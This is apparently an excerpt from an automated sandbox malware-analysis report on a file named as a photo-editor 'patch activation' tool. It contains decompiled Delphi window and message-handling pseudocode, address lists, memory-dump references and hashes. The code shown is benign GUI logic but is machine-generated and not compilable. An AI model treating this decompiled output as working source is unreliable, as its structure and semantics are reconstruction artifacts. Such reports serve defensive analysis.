					if(__eflags == 0) {
						_t207 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
						__eflags = _t207;
						if(_t207 == 0) {
							E00424624(_v8, _t287);
						} else {
							__eflags = _t207 == 0x100;
							if(_t207 == 0x100) {
								E0042466C(_v8);
							} else {
								E00424014(_t339);
							}
						}
						goto L87;
					}
					__eflags = _t129 - 0x14;
					if(__eflags > 0) {
						_t214 = _t129 - 0x15;
						__eflags = _t214;
						if(_t214 == 0) {
							__eflags =  *0x49c590 - 0x20;
							if( *0x49c590 >= 0x20) {
								__eflags =  *0x49e64c;
								if( *0x49e64c != 0) {
									 *0x49e64c();
								}
							}
							goto L87;
						}
						_t216 = _t214 - 1;
						__eflags = _t216;
						if(_t216 == 0) {
							_t217 = _v12;
							__eflags =  *(_t217 + 4);
							if( *(_t217 + 4) != 0) {
								E00404E54();
							}
							goto L87;
						}
						_t219 = _t216 - 6;
						__eflags = _t219;
						if(_t219 == 0) {
							E00424014(_t339);
							_pop(_t300);
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x7d)) =  ~( ~( *(_v12 + 4)));
							_t225 = _v12;
							__eflags =  *(_t225 + 4);
							if( *(_t225 + 4) == 0) {
								E00423F14(_v8, _t300);
								PostMessageA( *(_v8 + 0x20), 0xb001, 0, 0); // executed
							} else {
								E00423FA4(_v8);
								PostMessageA( *(_v8 + 0x20), 0xb000, 0, 0); // executed
							}
							goto L87;
						}
						__eflags = _t219 == 0x1b;
						if(_t219 == 0x1b) {
							 *(_v12 + 0xc) = E00424608(_v8);
							goto L87;
						} else {
							goto L86;
						}
					}
					if(__eflags == 0) {
						 *_v12 = 0x27;
						E00424014(_t339);
						goto L87;
					}
					_t241 = _t129 - 7;
					__eflags = _t241;
					if(_t241 == 0) {
						PostMessageA( *(_v8 + 0x20), 0xb01a, 0, 0); // executed
						E00424014(_t339);
						goto L87;
					}
					_t246 = _t241 - 3;
					__eflags = _t246;
					if(_t246 == 0) {
						_t247 = _v12;
						__eflags =  *(_t247 + 4);
						if( *(_t247 + 4) == 0) {
							E00424014(_t339);
							_pop(_t303);
							_t249 = _v8;
							__eflags =  *(_t249 + 0x84);
							if( *(_t249 + 0x84) == 0) {
								_t254 = E0041F334( *(_v8 + 0x20), _t281, _t331, _t333); // executed
								 *((intOrPtr*)(_v8 + 0x84)) = _t254;
							}
							E00423F14(_v8, _t303);
						} else {
							E00423FA4(_v8);
							_t257 = _v8;
							_t258 =  *(_t257 + 0x84);
							__eflags =  *(_t257 + 0x84);
							if( *(_t257 + 0x84) != 0) {
								E0041F3E8(_t258);
								__eflags = 0;
								 *((intOrPtr*)(_v8 + 0x84)) = 0;
							}
							E00424014(_t339);
						}
						goto L87;
					}
					_t262 = _t246 - 5;
					__eflags = _t262;
					if(_t262 == 0) {
						_t265 = IsIconic( *(_v8 + 0x20));
						__eflags = _t265;
						if(_t265 == 0) {
							E00424014(_t339);
						} else {
							E00424050(_t339);
						}
						goto L87;
					}
					__eflags = _t262 == 1;
					if(_t262 == 1) {
						_t269 = _v8;
						_t270 =  *(_t269 + 0x28);
						__eflags =  *(_t269 + 0x28);
						if( *(_t269 + 0x28) != 0) {
							E004230DC(_t270, _t287);
						}
						goto L87;
					} else {
						goto L86;
					}
				} else {
					_t286 = _t279 + 1;
					_t338 = 0;
					while(1) {
						_t274 = E0040B6DC( *((intOrPtr*)(_v8 + 0x80)), _t338);
						_t287 = _t274;
						if( *_t274() != 0) {
							_t134 = 0;
							_pop(_t330);
							 *[fs:eax] = _t330;
							break;
						}
						_t338 = _t338 + 1;
						_t286 = _t286 - 1;
						__eflags = _t286;
						if(_t286 != 0) {
							continue;
						}
						goto L5;
					}
					L88:
					return _t134;
				}
			}

0x004240a3
0x004240a4
0x004240a5
0x004240a8
0x004240ad
0x004240ae
0x004240b3
0x004240b6
0x004240be
0x004240cd
0x004240d0
0x00424104
0x0042410a
0x00424112
0x00424114
0x00424116
0x0042411b
0x0042417c
0x00424181
0x004241b7
0x004241b7
0x004241bc
0x00424531
0x00424536
0x00424538
0x0042453e
0x00424543
0x00424546
0x00424549
0x00424551
0x00424556
0x00424558
0x0042455f
0x0042455f
0x00424558
0x00424549
0x004245e2
0x004245e2
0x004245e4
0x004245e7
0x00000000
0x004245e7
0x004241c2
0x004241c2
0x004241c5
0x00424576
0x00000000
0x00424576
0x004241cb
0x004241cb
0x004241cc
0x0042457d
0x00424580
0x00424584
0x004245a9
0x00424586
0x00424594
0x00424594
0x00000000
0x00424584
0x004241d2
0x004241d5
0x004245b0
0x004245b3
0x004245b7
0x004245d3
0x004245b9
0x004245c5
0x004245c5
0x004241db
0x004245db
0x004245dc
0x004245e1
0x00000000
0x004241d5
0x00424183
0x00424444
0x00424447
0x00424449
0x0042444f
0x00424453
0x00424458
0x0042445a
0x00424468
0x0042446d
0x0042446f
0x0042447d
0x00424482
0x00424484
0x0042448a
0x00424491
0x004244a0
0x004244b9
0x004244bf
0x004244c4
0x004244ce
0x004244ce
0x00424484
0x0042446f
0x0042445a
0x00000000
0x00424449
0x0042418e
0x0042418e
0x00424191
0x004243c7
0x00000000
0x004243c7
0x00424197
0x00424197
0x0042419c
0x004244da
0x004244dd
0x004244e5
0x004244f7
0x004244f7
0x00000000
0x004244e5
0x004241a2
0x004241a2
0x004241a3
0x00424502
0x00424505
0x0042450d
0x0042451f
0x0042451f
0x00000000
0x0042450d
0x004241a9
0x004241ac
0x004243e9
0x004243ec
0x004243ee
0x004243f4
0x004243fb
0x00424409
0x0042440e
0x00424410
0x00424425
0x0042442a
0x0042442c
0x00424435
0x00424435
0x0042442c
0x00424410
0x004243fb
0x00000000
0x004241b2
0x00000000
0x004241b2
0x004241ac
0x0042411d
0x004241eb
0x004241eb
0x004241f0
0x004241fe
0x004241f2
0x004241f2
0x004241f7
0x0042420b
0x004241f9
0x00424216
0x0042421b
0x004241f7
0x00000000
0x004241f0
0x00424123
0x00424126
0x00424155
0x00424155
0x00424158
0x00424239
0x00424240
0x00424246
0x0042424d
0x00424253
0x00424253
0x0042424d
0x00000000
0x00424240
0x0042415e
0x0042415e
0x0042415f
0x004243cf
0x004243d2
0x004243d6
0x004243dc
0x004243dc
0x00000000
0x004243d6
0x00424165
0x00424165
0x00424168
0x004242d0
0x004242d5
0x004242de
0x004242e5
0x004242e8
0x004242eb
0x004242ef
0x00424316
0x0042432b
0x004242f1
0x004242f4
0x00424309
0x00424309
0x00000000
0x004242ef
0x0042416e
0x00424171
0x004242a6
0x00000000
0x00424177
0x00000000
0x00424177
0x00424171
0x00424128
0x00424289
0x00424290
0x00000000
0x00424295
0x0042412e
0x0042412e
0x00424131
0x004242be
0x004242c4
0x00000000
0x004242c9
0x00424137
0x00424137
0x0042413a
0x00424335
0x00424338
0x0042433c
0x00424370
0x00424375
0x00424376
0x00424379
0x00424380
0x00424388
0x00424390
0x00424390
0x00424399
0x0042433e
0x00424341
0x00424346
0x00424349
0x0042434f
0x00424351
0x00424353
0x0042435b
0x0042435d
0x0042435d
0x00424364
0x00424369
0x00000000
0x0042433c
0x00424140
0x00424140
0x00424143
0x00424265
0x0042426a
0x0042426c
0x0042427b
0x0042426e
0x0042426f
0x00424274
0x00000000
0x0042426c
0x00424149
0x0042414a
0x00424221
0x00424224
0x00424227
0x00424229
0x0042422f
0x0042422f
0x00000000
0x00424150
0x00000000
0x00424150
0x004240d2
0x004240d2
0x004240d3
0x004240d5
0x004240e0
0x004240e5
0x004240f1
0x004240f3
0x004240f5
0x004240f8
0x004240fb
0x004240fb
0x00424100
0x00424101
0x00424101
0x00424102
0x00000000
0x00000000
0x00000000
0x00424102
0x00424601
0x00424607
0x00424607

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf4869eca2361cbb04e67d9893ca8e0efefbc2066a61df9a9eefc4ce8fc7578
Instruction ID: 825bfe9503c2e42b9fb69ea357955289e6132b3f8b751ff356745ab72a8b0ef1
Opcode Fuzzy Hash: 5bf4869eca2361cbb04e67d9893ca8e0efefbc2066a61df9a9eefc4ce8fc7578
Instruction Fuzzy Hash: F0E18C34700124EFD710DB69E585A5EB7B4FB88304FA440A6FA85EB356C738EE81DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00422CEC Relevance: 18.3, APIs: 12, Instructions: 255
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00422CEC(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				void* __ecx;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;
				struct HWND__* _t106;
				long _t116;
				long _t150;
				intOrPtr _t156;
				int _t161;
				intOrPtr _t162;
				intOrPtr _t182;
				intOrPtr _t186;
				struct HWND__* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				void* _t207;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t214;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;

				_t227 = _t228;
				_push(0xf031);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x119) & 0x00000004) != 0) {
					E0040914C(__ebx, 0xf031, 1, __edi, __esi);
					E0040311C();
				}
				 *(_v8 + 0x119) =  *(_v8 + 0x119) | 0x00000004;
				_push(_t227);
				_push(0x42304e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t95 = _v8;
					_t232 =  *((char*)(_t95 + 0xc7));
					if( *((char*)(_t95 + 0xc7)) == 0) {
						 *[fs:eax] = _t228;
						E00402C00(_v8, 0xffdd, 0xf031, __eflags,  *[fs:eax], 0x422f55, _t227);
						_pop(_t212);
						_pop(_t207);
						 *[fs:eax] = _t212;
						_t100 =  *0x49e630; // 0x2250660
						__eflags =  *((intOrPtr*)(_t100 + 0x40)) - _v8;
						if( *((intOrPtr*)(_t100 + 0x40)) == _v8) {
							__eflags = 0;
							E004222BC(_v8, _t207, 0);
						}
						_t102 = _v8;
						__eflags =  *((char*)(_t102 + 0x116)) - 1;
						if( *((char*)(_t102 + 0x116)) != 1) {
							_t103 = _v8;
							__eflags =  *(_t103 + 0x119) & 0x00000008;
							if(( *(_t103 + 0x119) & 0x00000008) == 0) {
								_t195 = 0;
								_t105 = E00418670(_v8);
								_t106 = GetActiveWindow();
								__eflags = _t105 - _t106;
								if(_t105 == _t106) {
									_t116 = IsIconic(E00418670(_v8));
									__eflags = _t116;
									if(_t116 == 0) {
										_t195 = E0041F484(E00418670(_v8));
									}
								}
								__eflags = _t195;
								if(_t195 == 0) {
									ShowWindow(E00418670(_v8), 0);
								} else {
									SetWindowPos(E00418670(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t195);
								}
							} else {
								SetWindowPos(E00418670(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00416B40(_v8);
						}
					} else {
						 *[fs:eax] = _t228;
						E00402C00(_v8, 0xffdc, 0xf031, _t232,  *[fs:eax], 0x422d7a, _t227);
						_pop(_t214);
						 *[fs:eax] = _t214;
						if( *((char*)(_v8 + 0x117)) == 4) {
							if( *((char*)(_v8 + 0x116)) != 1) {
								_t198 = E00423638() -  *(_v8 + 0x2c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc ebx, 0x0");
								}
								_t222 = E00423630() -  *(_v8 + 0x30);
								__eflags = _t222;
								_t223 = _t222 >> 1;
								if(_t222 < 0) {
									asm("adc esi, 0x0");
								}
							} else {
								_t182 =  *0x49e62c; // 0x2252410
								_t202 = E00414B4C( *((intOrPtr*)(_t182 + 0x28))) -  *(_v8 + 0x2c);
								_t199 = _t202 >> 1;
								if(_t202 < 0) {
									asm("adc ebx, 0x0");
								}
								_t186 =  *0x49e62c; // 0x2252410
								_t225 = E00414B90( *((intOrPtr*)(_t186 + 0x28))) -  *(_v8 + 0x30);
								_t223 = _t225 >> 1;
								if(_t225 < 0) {
									asm("adc esi, 0x0");
								}
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							if(_t223 < 0) {
								_t223 = 0;
							}
							 *((intOrPtr*)( *_v8 + 0x4c))( *(_v8 + 0x30),  *(_v8 + 0x2c));
						}
						 *((char*)(_v8 + 0x117)) = 0;
						if( *((char*)(_v8 + 0x116)) != 1) {
							ShowWindow(E00418670(_v8),  *(0x49c5d8 + ( *(_v8 + 0x112) & 0x000000ff) * 4)); // executed
						} else {
							if( *(_v8 + 0x112) != 2) {
								ShowWindow(E00418670(_v8),  *(0x49c5d8 + ( *(_v8 + 0x112) & 0x000000ff) * 4));
								_t150 =  *(_v8 + 0x30) << 0x00000010 |  *(_v8 + 0x2c);
								__eflags = _t150;
								CallWindowProcA(0x405e14, E00418670(_v8), 5, 0, _t150);
								E00415154(_v8);
							} else {
								_t161 = E00418670(_v8);
								_t162 =  *0x49e62c; // 0x2252410
								SendMessageA( *( *((intOrPtr*)(_t162 + 0x28)) + 0x130), 0x223, _t161, 0);
								ShowWindow(E00418670(_v8), 3);
							}
							_t156 =  *0x49e62c; // 0x2252410
							SendMessageA( *( *((intOrPtr*)(_t156 + 0x28)) + 0x130), 0x234, 0, 0);
						}
					}
				}
				_pop(_t211);
				 *[fs:eax] = _t211;
				_push(0x423055);
				_t94 = _v8;
				 *(_t94 + 0x119) =  *(_t94 + 0x119) & 0x000000fb;
				return _t94;
			}

0x00422ced
0x00422cef
0x00422cf0
0x00422cf1
0x00422cf2
0x00422cf3
0x00422cfd
0x00422d17
0x00422d1c
0x00422d1c
0x00422d24
0x00422d2d
0x00422d2e
0x00422d33
0x00422d36
0x00422d40
0x00422d46
0x00422d49
0x00422d50
0x00422f3c
0x00422f46
0x00422f4d
0x00422f4f
0x00422f50
0x00422f6c
0x00422f74
0x00422f77
0x00422f79
0x00422f7e
0x00422f7e
0x00422f83
0x00422f86
0x00422f8d
0x00422f9c
0x00422f9f
0x00422fa6
0x00422fc7
0x00422fcc
0x00422fd3
0x00422fd8
0x00422fda
0x00422fe5
0x00422fea
0x00422fec
0x00422ffb
0x00422ffb
0x00422fec
0x00422ffd
0x00422fff
0x00423031
0x00423001
0x00423019
0x0042301f
0x0042301f
0x00422fa8
0x00422fc0
0x00422fc0
0x00422f8f
0x00422f92
0x00422f92
0x00422d56
0x00422d61
0x00422d6b
0x00422d72
0x00422d75
0x00422d9b
0x00422dab
0x00422df6
0x00422df6
0x00422df9
0x00422dfb
0x00422dfd
0x00422dfd
0x00422e0f
0x00422e0f
0x00422e12
0x00422e14
0x00422e16
0x00422e16
0x00422dad
0x00422dad
0x00422dbf
0x00422dc2
0x00422dc4
0x00422dc6
0x00422dc6
0x00422dc9
0x00422ddb
0x00422dde
0x00422de0
0x00422de2
0x00422de2
0x00422de0
0x00422e1b
0x00422e1d
0x00422e1d
0x00422e21
0x00422e23
0x00422e23
0x00422e3c
0x00422e3c
0x00422e42
0x00422e53
0x00422f27
0x00422e59
0x00422e63
0x00422eb6
0x00422ec7
0x00422ec7
0x00422edd
0x00422ee5
0x00422e65
0x00422e6a
0x00422e75
0x00422e84
0x00422e94
0x00422e94
0x00422ef3
0x00422f02
0x00422f02
0x00422e53
0x00422d50
0x00423038
0x0042303b
0x0042303e
0x00423043
0x00423046
0x0042304d

APIs

SendMessageA.USER32 ref: 00422E84
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,0042304E), ref: 00422E94

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: fee8d02af05d41bac173c1050129a49de0b4046ad33b8f8baa5915edb3818267
Instruction ID: 26a98208f56e96a8b9863cf96f01cb8393c818091eec428a2aa80c5483449fd4
Opcode Fuzzy Hash: fee8d02af05d41bac173c1050129a49de0b4046ad33b8f8baa5915edb3818267
Instruction Fuzzy Hash: 82915270B04254EFD711DFA9DA86F9E77F4AB04304F5600BAF504AB392C779AE40AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004688B8 Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1679
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E004688B8(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, signed int __esi, void* __fp0) {
				char _v8;
				char _v9;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HMENU__* _v28;
				char _v29;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v64;
				char _v68;
				char _t571;
				intOrPtr _t587;
				void* _t622;
				intOrPtr _t633;
				intOrPtr _t656;
				signed int _t657;
				struct HINSTANCE__* _t663;
				void* _t667;
				intOrPtr _t706;
				intOrPtr _t707;
				intOrPtr _t730;
				intOrPtr _t731;
				intOrPtr _t755;
				intOrPtr _t756;
				intOrPtr _t771;
				intOrPtr _t772;
				intOrPtr _t805;
				void* _t818;
				void* _t843;
				void* _t862;
				void* _t868;
				intOrPtr _t898;
				intOrPtr _t931;
				void* _t944;
				void* _t970;
				intOrPtr _t992;
				intOrPtr _t1015;
				intOrPtr _t1043;
				intOrPtr _t1052;
				intOrPtr _t1061;
				intOrPtr _t1070;
				intOrPtr _t1071;
				void* _t1098;
				intOrPtr _t1128;
				char _t1133;
				char _t1134;
				intOrPtr _t1138;
				intOrPtr _t1145;
				void* _t1147;
				intOrPtr _t1148;
				intOrPtr _t1161;
				intOrPtr _t1166;
				intOrPtr _t1195;
				void* _t1205;
				intOrPtr _t1206;
				intOrPtr _t1215;
				intOrPtr _t1220;
				intOrPtr _t1222;
				intOrPtr _t1226;
				intOrPtr _t1237;
				void* _t1239;
				intOrPtr _t1241;
				intOrPtr _t1253;
				intOrPtr _t1278;
				void* _t1280;
				intOrPtr _t1288;
				void* _t1290;
				intOrPtr _t1292;
				intOrPtr _t1299;
				intOrPtr _t1312;
				intOrPtr _t1330;
				intOrPtr _t1345;
				intOrPtr _t1350;
				intOrPtr _t1355;
				intOrPtr _t1400;
				intOrPtr _t1459;
				intOrPtr _t1462;
				intOrPtr _t1476;
				intOrPtr* _t1487;
				intOrPtr _t1488;
				intOrPtr _t1504;
				intOrPtr _t1506;
				char _t1538;
				intOrPtr _t1552;
				intOrPtr _t1553;
				intOrPtr _t1554;
				intOrPtr _t1555;
				void* _t1575;
				intOrPtr _t1586;
				intOrPtr _t1593;
				intOrPtr _t1594;
				intOrPtr _t1596;
				intOrPtr _t1597;
				intOrPtr _t1605;
				intOrPtr _t1609;
				intOrPtr _t1615;
				void* _t1643;
				intOrPtr _t1651;
				void* _t1703;
				intOrPtr _t1709;
				intOrPtr _t1719;
				intOrPtr _t1738;
				intOrPtr _t1742;
				intOrPtr _t1743;
				intOrPtr _t1750;
				intOrPtr _t1751;
				intOrPtr _t1768;
				intOrPtr _t1791;
				intOrPtr _t1802;
				intOrPtr _t1829;
				signed int _t1833;
				signed int _t1834;
				signed int _t1839;
				signed int _t1840;
				intOrPtr _t1844;
				intOrPtr _t1853;
				intOrPtr _t1855;
				intOrPtr _t1856;
				intOrPtr _t1867;
				intOrPtr _t1871;
				void* _t1888;
				void* _t1895;
				void* _t1896;
				intOrPtr* _t1898;
				void* _t1905;
				intOrPtr* _t1906;
				struct HMENU__* _t1914;
				void* _t1915;
				struct HMENU__* _t1916;
				signed int _t1918;
				signed int _t1920;
				void* _t1922;
				void* _t1923;
				intOrPtr _t1924;
				void* _t1931;
				void* _t1932;
				signed char _t1936;
				void* _t1943;
				void* _t1946;
				void* _t1949;
				void* _t2004;

				_t2004 = __fp0;
				_t1887 = __esi;
				_t1873 = __edi;
				_t1538 = __edx;
				_t1488 = __ecx;
				_t1922 = _t1923;
				_t1924 = _t1923 + 0xffffffc0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v52 = 0;
				_v68 = 0;
				_v24 = 0;
				if(__edx != 0) {
					_t1924 = _t1924 + 0xfffffff0;
					_t571 = E00402D30(_t571, _t1922);
				}
				_v16 = _t1488;
				_v9 = _t1538;
				_v8 = _t571;
				_t1487 =  &_v8;
				_push(_t1922);
				_push(0x46a02d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1924;
				E004985E8(0); // executed
				 *((intOrPtr*)( *_t1487 + 0x2fc)) = E00402B30(1);
				 *((intOrPtr*)( *_t1487 + 0x338)) = E00402B30(1);
				 *((intOrPtr*)( *_t1487 + 0x324)) = E00402B30(1);
				 *((intOrPtr*)( *_t1487 + 0x328)) = E00402B30(1);
				 *((intOrPtr*)( *_t1487 + 0x32c)) = E00402B30(1);
				 *((intOrPtr*)( *_t1487 + 0x330)) = E00402B30(1);
				_t587 =  *0x49f3ac; // 0x2252c84
				if( *((intOrPtr*)(_t587 + 8)) == 1) {
					_t1459 =  *0x49f3ac; // 0x2252c84
					_t1918 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)(E0040B6DC(_t1459, 0))) + 0x1c))();
					if(_t1918 > 0) {
						_t1476 =  *((intOrPtr*)( *_t1487 + 0x250));
						E00414ACC( *((intOrPtr*)( *_t1487 + 0x250)),  *((intOrPtr*)(_t1476 + 0x30)) - _t1918);
						_t1871 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x28));
						_t1920 = _t1918 >> 1;
						if( *((intOrPtr*)(_t1476 + 0x30)) - _t1918 < 0) {
							asm("adc esi, 0x0");
						}
						E00414A8C( *((intOrPtr*)( *_t1487 + 0x250)), _t1871 + _t1920);
					}
					_t1462 =  *0x49f3ac; // 0x2252c84
					_t1887 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x2c)) -  *((intOrPtr*)( *((intOrPtr*)(E0040B6DC(_t1462, 0))) + 0x20))();
					if(_t1887 > 0) {
						_t1931 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x2c)) - _t1887;
						E00414AAC( *((intOrPtr*)( *_t1487 + 0x250)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x2c)) - _t1887);
						_t1867 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x24));
						_t1887 = _t1887 >> 1;
						if(_t1931 < 0) {
							asm("adc esi, 0x0");
						}
						_t1932 = _t1867 + _t1887;
						E00414A6C( *((intOrPtr*)( *_t1487 + 0x250)));
					}
				}
				E004988F0( *_t1487, _t1932);
				_t1933 =  *0x49f31b & 0x00000020;
				if(( *0x49f31b & 0x00000020) == 0) {
					E0049885C( *_t1487);
				} else {
					_t1856 =  *0x49f0f4; // 0x31f3828
					E00498738( *_t1487, 1, _t1856);
				}
				_t1490 =  *0x49f35c; // 0xc
				_t1552 =  *0x49f334; // 0x229f7b8
				E0049824C( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x234)) + 0x44)), _t1487, _t1490, _t1552, _t1873, _t1887, 0xc, 0);
				_t1553 =  *0x46a050; // 0x1
				E0041A860( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x234)) + 0x44)), _t1553, _t1933);
				_t1554 =  *0x46a050; // 0x1
				E0041A860( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x248)) + 0x44)), _t1554, _t1933);
				if(( *0x49f31b & 0x00000020) == 0) {
					__eflags =  *0x49f320 & 0x00000008;
					if(( *0x49f320 & 0x00000008) == 0) {
						_t1490 =  &_v52;
						_t1555 =  *0x49f474; // 0x2268ae0
						E00451C30(0xa2,  &_v52, _t1555);
						E00414FA8( *_t1487, _t1487, _v52, _t1873, _t1887);
					} else {
						_t1490 =  &_v52;
						_t1853 =  *0x49f478; // 0x2268b28
						E00451C30(0xa2,  &_v52, _t1853);
						E00414FA8( *_t1487, _t1487, _v52, _t1873, _t1887);
					}
				} else {
					_t1855 =  *0x49eec8; // 0x230dd30
					E00414FA8( *_t1487, _t1487, _t1855, _t1873, _t1887);
				}
				if(( *0x49f31b & 0x00000020) == 0) {
					_v40 = E00414B4C( *_t1487);
					_v44 = E00414B90( *_t1487);
					_t1936 =  *( *_t1487 + 0x110) |  *0x46a054;
					E00421428( *_t1487, _t1490,  *( *_t1487 + 0x110) |  *0x46a054);
					E00421454( *_t1487, 1);
					E00420FF8( *_t1487, _v40);
					E00421024( *_t1487, _v44);
				}
				_v60 = 0xc;
				_v59 = 0xe;
				_v58 = 0xf;
				_v57 = 0x10;
				_v56 = 0x12;
				_t1888 = E00498688( *_t1487, _t1487, 4,  &_v60, _t1873, _t1887, _t1936);
				_v20 = E004989AC( *_t1487, 0xa);
				E00414AAC( *((intOrPtr*)( *_t1487 + 0x1c0)), _t1888);
				E00414AAC( *((intOrPtr*)( *_t1487 + 0x1bc)), _t1888);
				E00414AAC( *((intOrPtr*)( *_t1487 + 0x1b8)), _t1888);
				_t622 = E00414B4C( *_t1487);
				E00414A6C( *((intOrPtr*)( *_t1487 + 0x1b8)));
				E00414A6C( *((intOrPtr*)( *_t1487 + 0x1bc)));
				_t1879 = _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888;
				E00414A6C( *((intOrPtr*)( *_t1487 + 0x1c0)));
				_t633 =  *0x49f3a8; // 0x2252c70
				E00468834(_t633,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x230)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x230)) + 0x2c)));
				E00461CA0( *((intOrPtr*)( *_t1487 + 0x230)));
				E00461CAC( *((intOrPtr*)( *_t1487 + 0x230)), 1);
				E00461CF4( *((intOrPtr*)( *_t1487 + 0x230)), 0 | ( *0x49f31f & 0x00000004) != 0x00000000);
				E00461D20( *((intOrPtr*)( *_t1487 + 0x230)));
				E00461CA0( *((intOrPtr*)( *_t1487 + 0x264)));
				E00461CAC( *((intOrPtr*)( *_t1487 + 0x264)), 1);
				E00461CF4( *((intOrPtr*)( *_t1487 + 0x264)), 0 | ( *0x49f31f & 0x00000004) != 0x00000000);
				_t656 =  *0x49f3ac; // 0x2252c84
				_t657 = E00468834(_t656,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x2c)));
				E00461CA0( *((intOrPtr*)( *_t1487 + 0x250)));
				E00461CF4( *((intOrPtr*)( *_t1487 + 0x250)), _t657 & 0xffffff00 | ( *0x49f31f & 0x00000004) != 0x00000000);
				_t663 =  *0x49e014; // 0x400000
				_push(LoadBitmapA(_t663, "STOPIMAGE"));
				_t667 = E00461D20( *((intOrPtr*)( *_t1487 + 0x2bc)));
				_pop(_t1575);
				E0041DB40(_t667, _t1575);
				E00461CC4( *((intOrPtr*)( *_t1487 + 0x2bc)), 0xc0c0c0);
				E00461CDC( *((intOrPtr*)( *_t1487 + 0x2bc)),  *((intOrPtr*)( *_t1487 + 0x48)));
				E00468610(_t1487,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x250)) + 0x30)), _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888,  *((intOrPtr*)( *_t1487 + 0x250)),  *0x49f31f & 0x00000004, _t1922); // executed
				E0046A204( *_t1487, 1,  *0x49f31f & 0x00000004, 0, 0, 0);
				E00467C8C(0xc9,  &_v52);
				E0040357C( &_v52, 0x46a06c);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x234)), _t1487, _v52, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888,  *((intOrPtr*)( *_t1487 + 0x250)));
				E00467FC4( *((intOrPtr*)( *_t1487 + 0x234)));
				E00467FCC( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x234)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x234)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x268)) + 0x28)),  *((intOrPtr*)( *_t1487 + 0x268)));
				E00467C8C(0xca,  &_v52);
